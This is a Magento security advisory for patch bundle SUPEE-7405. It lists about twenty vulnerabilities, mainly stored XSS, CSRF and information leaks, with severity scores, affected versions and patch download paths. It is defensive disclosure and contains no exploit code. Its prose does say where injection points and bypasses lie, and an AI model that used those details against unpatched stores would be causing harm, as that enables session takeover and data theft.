New Security Update

Install critical updates for Magento 1.x and Magento 2.x versions

SUPEE-7405

February 23, 2016

Updated February 23, 2016

Updated versions of this release are now available. The updates add support for PHP 5.3 and address issues with upload file permissions, merging carts, and SOAP APIs experienced with the original release. They DO NOT address any new security issues.

RELEASE DETAILS

We highly recommend that all users either install the SUPEE-7405 v1.1 patch bundle, or upgrade to Magento Enterprise Edition 1.14.2.4 or Magento Community Edition 1.9.2.4.

You must install the SUPEE-7405 v 1.0 patch before installing the SUPEE-7405 v 1.1  patch bundle if you are running a version of Magento Enterprise Edition prior to 1.14.2.3 or Magento Community Edition prior to 1.9.2.3.

You do not need to install the SUPEE-7405 v 1.0 patch if you are running Magento Enterprise Edition 1.14.2.3, Magento Community Edition 1.9.2.3, or have previously installed the SUPEE-7405 v 1.0 patch on an earlier version of Magento Community Edition.

The SUPEE-7405 v 1.1 patch bundle includes the following:

Cart Merge Patch (SUPEE-7978)

Carts with identical items now merge correctly. Previously, when a cart with one item was merged with another cart that contained the same item, Magento did not merge the cart totals correctly. The cart now includes only one item, and the total is correct.

SOAP API Patch (SUPEE-7822)

The Magento SOAP API now works as expected. Previously after installing the SUPEE-7405 v1.0 patch, an API request would cause a 500 error, and Magento would log an exception.

PHP 5.3 Compatibility (SUPEE-7882)

The patch was not compatible with PHP 5.3 for earlier versions of Magento that were still supporting this version. Merchants experiencing this issue were unable to view sales information in the Admin.

Upload File Permissions

The patch restores less restrictive file permissions (0666 for files and 0777 for directories) as more strict permissions introduced by the original SUPEE-7405 patch caused many merchants not to be able to view uploaded product images, depending on hosting provider configuration.

DOWNLOADING THE UPDATES

Patches and upgrades are available for the following Magento versions:

  • Enterprise Edition 1.9.0.0-1.14.2.3: SUPEE-7405 v1.1 or upgrade to Enterprise Edition 1.14.2.4

  • Community Edition 1.5.0.0-1.9.2.3: SUPEE-7405 v1.1 or upgrade to Community Edition 1.9.2.4

To download a patch or release, choose from the following options:

Partners:

Enterprise Edition 1.14.2.4

Partner Portal > Magento Enterprise Edition > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x > Version 1.x Releases > Version 1.14.2.4

SUPEE-7405 v1.1

Partner Portal > Magento Enterprise Edition > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x > Support and Security Patches > Security Patches > Security Patches – February 2016 

Enterprise Edition Merchants:

Enterprise Edition 1.14.2.4

My Account > Downloads Tab > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x > Version
1.x Releases > Version 1.14.2.4

SUPEE-7405 v1.1

My Account > Downloads Tab > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x > Support and Security Patches > Security Patches > Security Patches – February 2016

 

 

 

 

 

 

Community Edition Merchants:

Community Edition 1.9.2.4

Community Edition Download Page > Release Archive Tab

SUPEE-7405 v1.1

Community Edition Download Page > Release Archive Tab > Magento Community Edition Patches - 1.x Section

 

 

 

 

January 20, 2016

SUPEE-7405 is a bundle of patches for Magento 1.x that resolve several security-related issues. You can find more details on the vulnerabilities address by this patch below:

Stored XSS via email address - APPSEC-1213
Type:Cross-site Scripting (XSS) - Stored
CVSSv3 Severity:9.3 (Critical)
Known Attacks:None
Description:

During customer registration on the storefront, a user can provide an email address that contains JavaScript code. Magento does not properly validate this email and executes it in Admin context when viewing the order in the backend. This JavaScript code can steal an administrator session or act on behalf of a store administrator.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In:CE 1.9.2.3, EE 1.14.2.3
Reporter:Marc-Alexandre Montpas
Stored XSS in Order Comments - APPSEC-1239
Type:Cross-site Scripting (XSS) - Stored
CVSSv3 Severity:9.3 (Critical)
Known Attacks:None
Description:

A user can append comments to an order using a specially crafted request that relies upon the PayFlow Pro payment module. Magento does not filter the request properly, which potentially results in JavaScript code being saved in database (see issue APPSEC-1240) and then executed server-side when the administrator tries to view the order. This attack can lead to a takeover of the administrator session or executing actions on behalf of administrator.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In:CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter:Erik Wohllebe
Stored XSS in Order - APPSEC-1260
Type:Cross-site Scripting (XSS) - Stored
CVSSv3 Severity:7.5 (High)
Known Attacks:None
Description:

In certain configurations, Magento uses the HTTP_X_FORWARDED_FOR header as the customer IP address and displays it without sanitization in the Admin Panel. An attacker can use this header to inject JavaScript code into Order View forms in Admin Panel. The code is then executed when a user visits an Order View form, allowing the take over of an administrator session or for an unauthorized user to execute actions on behalf of an administrator. Note that we do not recommend using this header configuration setting.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In:CE 1.9.2.3, EE 1.14.2.3
Reporter:Peter O'Callaghan
Guest order view protection code vulnerable to brute-force attack - APPSEC-1270
Type:Information Leakage
CVSSv3 Severity:7.5 (High)
Known Attacks:None
Description:

The guest order view protection code makes it possible to access guest order information for some orders. (This is due to how the code is generated and compared with stored values.) While the attack cannot target a specific order or allow a user to view all orders, it can be used to extract order information from store.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In:CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter:Peter O'Callaghan
Information Disclosure in RSS feed - APPSEC-1171
Type:Information Leakage
CVSSv3 Severity:7.5 (High)
Known Attacks:None
Description:

You can download order comments and other order-related information by providing special parameters to the RSS feed request. This information, depending on contents of the order comments, can disclose private information or be used to access customer account or other customer information.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In:CE 1.9.2.3, EE 1.14.2.3
Reporter:Egidio Romano
CSRF token not validated on backend login page - APPSEC-1206
Type: Cross-site Request Forgery (CSRF)
CVSSv3 Severity:7.4 (High)
Known Attacks:None
Description:

The lack of form protection on the Admin Login page enables potential request forgery attacks. These forgery attacks require the administrator to be tricked into clicking on a link by phishing or by link hiding.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In:CE 1.9.2.3, EE 1.14.2.3
Reporter:Alistair Stead
Malicious files can be upload via backend - APPSEC-1306
Type:Insufficient Protection
CVSSv3 Severity:6.5 (Medium)
Known Attacks:None
Description:

An administrator can upload a file containing executable code to the server as a logo file if they rename the file to a supported image file format. The issue is not exploitable by itself unless the administrator account that has access to configuration is hacked. However, site audits may flag this issue, and it can cause security audits (such as PCI) to fail.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In:CE 1.9.2.3, EE 1.14.2.3
Reporter:Magento Merchant
CSRF leading to execution of admin actions after login - APPSEC-1179
Type: Cross-site Request Forgery (CSRF)
CVSSv3 Severity:6.1 (Medium)
Known Attacks:None
Description:

A user can execute a CSRF attack on URLs that result in a server-side action (such as deleting customers) when the administrator is logged out. This action is not executed until the administrator logs in after the attack. The attack relies upon phishing — that is, it requires the administrator to click on a malicious link — and requires the administrator to log in after the attack.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In:CE 1.9.2.3, EE 1.14.2.3
Reporter:Clement Mezino
Excel Formula Injection via CSV/XML export - APPSEC-1110
Type:Formula Injection
CVSSv3 Severity:6.1 (Medium)
Known Attacks:None
Description:

We have found an additional attack path not covered by issue APPSEC-978, which was resolved in patch https://magento.com/security/patches/supee-5994 for Magento 1.x.

A user can provide input that executes a formula when exported and opened in a spreadsheet such as Microsoft Excel. This formula could modify data, export personal data to another site, or cause remote code execution. The spreadsheet typically displays a warning message, which the user must dismiss, for the attack to succeed.

Note: The code that protects against this attack modifies the exported file by prepending some fields with a space. As a result, this fix can lead to data inconsistency. (Data inconsistency might occur when fields, such as product name or description, start from =, + or - sign.)

If this fix causes problems with your data processing, you can disable it. Be aware, however, that this protection is enabled by default. Disabling can lead to an increased security risk.

To disable this fix, log in to the Admin Panel, then use the System tab to navigate to the Export CSV fields.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In:CE 1.9.2.3, EE 1.14.2.3
Reporter:Nikhil Srivastava
XSS in Product Custom Options - APPSEC-1267
Type:Cross-site Scripting (XSS) - Stored
CVSSv3 Severity:5.9 (Medium)
Known Attacks:None
Description:

When using products with custom option for file upload, a user can upload a file with a file name that contains JavaScript code. This code could be executed in the Admin Panel context by editing the quote that contains the product, allowing both for the takeover of an administrator session or for an unauthorized user to execute malicious actions on behalf of an administrator.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In:CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter:Erik Wohllebe
Editing or Deleting Reviews without permission - APPSEC-1268
Type:Insufficient Data Protection
CVSSv3 Severity:5.4 (Medium)
Known Attacks:None
Description:

Insufficient verification of request parameters allows any user to delete or edit product reviews. The edited reviews are returned to a pending state. This attack does not depend on setting allowing guest users to post reviews. As a result, a malicious user could access the store for spamming purposes or delete all reviews from store.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In:CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter:Peter O'Callaghan
Disruption of email delivery - APPSEC-1177
Type:Denial of Service
CVSSv3 Severity:5.3 (Medium)
Known Attacks:None
Description:

An error in the email address associated with a store newsletter can interfere with the sending of newsletter email. This error can constitute a Denial of Service attack. In some cases, including accented characters can generate this error.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In:CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter:Benjamin Lessani
CAPTCHA Bypass - APPSEC-1283
Type:Brute Force (Generic) / Insufficient Anti-automation
CVSSv3 Severity:5.3 (Medium)
Known Attacks:None
Description:

A user can bypass CAPTCHA validation on the Magento frontend, which enables unrestricted password guessing attempts. Even with CAPTCHA protection enabled, this increases the risk of spam or password guessing attacks on customer accounts.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In:CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter:Erik Wohllebe
Admin path disclosure via Authorize.net - APPSEC-1208
Type:Information Disclosure (Internal)
CVSSv3 Severity:5.3 (Medium)
Known Attacks:None
Description:

A user can identify the URL for the Magento Admin Panel by calling Authorize.net payment module URLs. While exposure of the Admin path isn’t a direct security issue, it makes it easier to carry out other malicious attacks, including password guessing or phishing.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In:CE 1.9.2.3, EE 1.14.2.3
Reporter:Erik Wohllebe
XSS Payload in website's translation table - APPSEC-1214
Type:Cross-site Scripting (XSS) - Stored
CVSSv3 Severity:4.7 (Medium)
Known Attacks:None
Description:

When inline translations are enabled on the frontend, a user can inject a translation string that contains JavaScript code. This JavaScript code will be later included and executed on the affected pages for all users, which can lead to a session takeover or an information disclosure. This is a low risk issue as inline translations should never be enabled without limits on a production site.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In:CE 1.9.2.3, EE 1.14.2.3
Reporter:Marc-Alexandre Montpas
CSRF Delete Items from Cart - APPSEC-1212
Type:Cross-site Request Forgery (CSRF)
CVSSv3 Severity:4.3 (Medium)
Known Attacks:None
Description:

Magento does not validate the form key when deleting items from the shopping cart using a GET request. As a result, a user could use phishing emails or other malicious attacks to trick a customer into deleting items from his cart.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In:CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter:Vishnu Vardhan Reddy (Vishnu dfx)
XSS via custom options - APPSEC-1276
Type:Cross-site Scripting (XSS) - Stored
CVSSv3 Severity:3.8 (Low)
Known Attacks:None
Description:

A user can insert XSS JavaScript into a custom option title when creating it on the server side. The code can then be executed on the Magento frontend. Although this vulnerability does not directly enable a malicious attack on a store, such unvalidated input should not be allowed in a Magento installation.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In:CE 1.9.2.3, EE 1.14.2.3
Reporter:Allan MacGregor
Risky serialized string filtering - APPSEC-1204
Type:Unsafe Code
CVSSv3 Severity:0 (Low)
Known Attacks:None
Description:

Magento includes code to sanitize serialized strings and raises errors when an object is included. This code potentially allows specially crafted serialized objects to be unserialized by Magento, which can lead to possible malicious code execution. While the issue itself is not exploitable, a user can combine it with other attacks to support remote code execution.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In:CE 1.9.2.3, EE 1.14.2.3
Reporter:Taoguang Chen
Reflected XSS in backend coupon entry - APPSEC-1305
Type:Cross-site Scripting (XSS) - Reflected
CVSSv3 Severity:0 (Low)
Known Attacks:None
Description:

When working with an order that contains items in the shopping cart, an administrator can enter JavaScript into the coupon code field of the Manage Shopping Cart page. This JavaScript can be executed later. While this feature is not an exploitable security issue, site audits may flag this issue, and it can cause security audits (such as PCI) to fail.

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3
Fixed In:CE 1.9.2.3, EE 1.14.2.3
Reporter:Magento Merchant
Injected code can be stored in database - APPSEC-1240
Type:Improper Input Handling
CVSSv3 Severity:0 (Low)
Known Attacks:None
Description:

JavaScript code that is passed using the Payflow Pro payment module is not sanitized but is saved to the database. This issue by itself is not a security risk. (This issue is related to APPSEC-1239.)

Product(s) Affected:Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3; Magento 2 CE & EE prior to 2.0.1
Fixed In:CE 1.9.2.3, EE 1.14.2.3, CE & EE 2.0.1
Reporter:Internal

Additionally, the patch resolves issues identified by Magento merchants after installing previous security patches:

  • URLs are redirected to 404 page or installer

  • Caching issues when running PHP 5.3.3 without PHP-FPM

  • Block permissions code issue

  • Password forgotten link redirects to login page

  • Administrator password can be reused (Enterprise Edition only)

Please refer to Security Best Practices for additional information how to secure your site.

To download the patch or release, choose from the following options:

Partners:

  • Enterprise Edition 1.14.2.3: Go to the Partner Portal, select Technical Resources and then select Download from the Enterprise Edition panel. Next, navigate to Magento Enterprise Edition > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x Release and look for the folder titled "Version 1.14.2.3".

  • SUPEE-7405: Go to the Partner Portal, select Technical Resources and then select Download from the Enterprise Edition panel. Next, navigate to Magento Enterprise Edition > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x Release > Support and Security Patches and look for the folder titled "Security Patches - January 2016".

Enterprise Edition Merchants:

  • Enterprise Edition 1.14.2.3: Go to My Account, select the Downloads tab, and then navigate to Magento Enterprise Edition > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x Release and look for the folder titled "Version 1.14.2.3".

  • SUPEE-7405: Go to My Account, select the Downloads tab, and then navigate to Magento Enterprise Edition > Magento Enterprise Edition 1.X > Magento Enterprise Edition 1.x Release > Support Patches / Security Patches and look for the folder titled "Security Patches - January 2016".

Community Edition Merchants:

  • Community Edition 1.9.2.3: Go to download page, select the Release Archive tab.

  • SUPEE-7405: Patches for earlier versions of Community Edition can be found on the Community Edition download page. Select the Release Archive tab and look for SUPEE-7405 in the Magento Community Edition Patches - 1.x section.

Be sure to implement and test the patch in a development environment first to confirm that it works as expected before deploying it to a production site. Information about installing patches for Magento Enterprise Edition and Magento Community Edition is available online.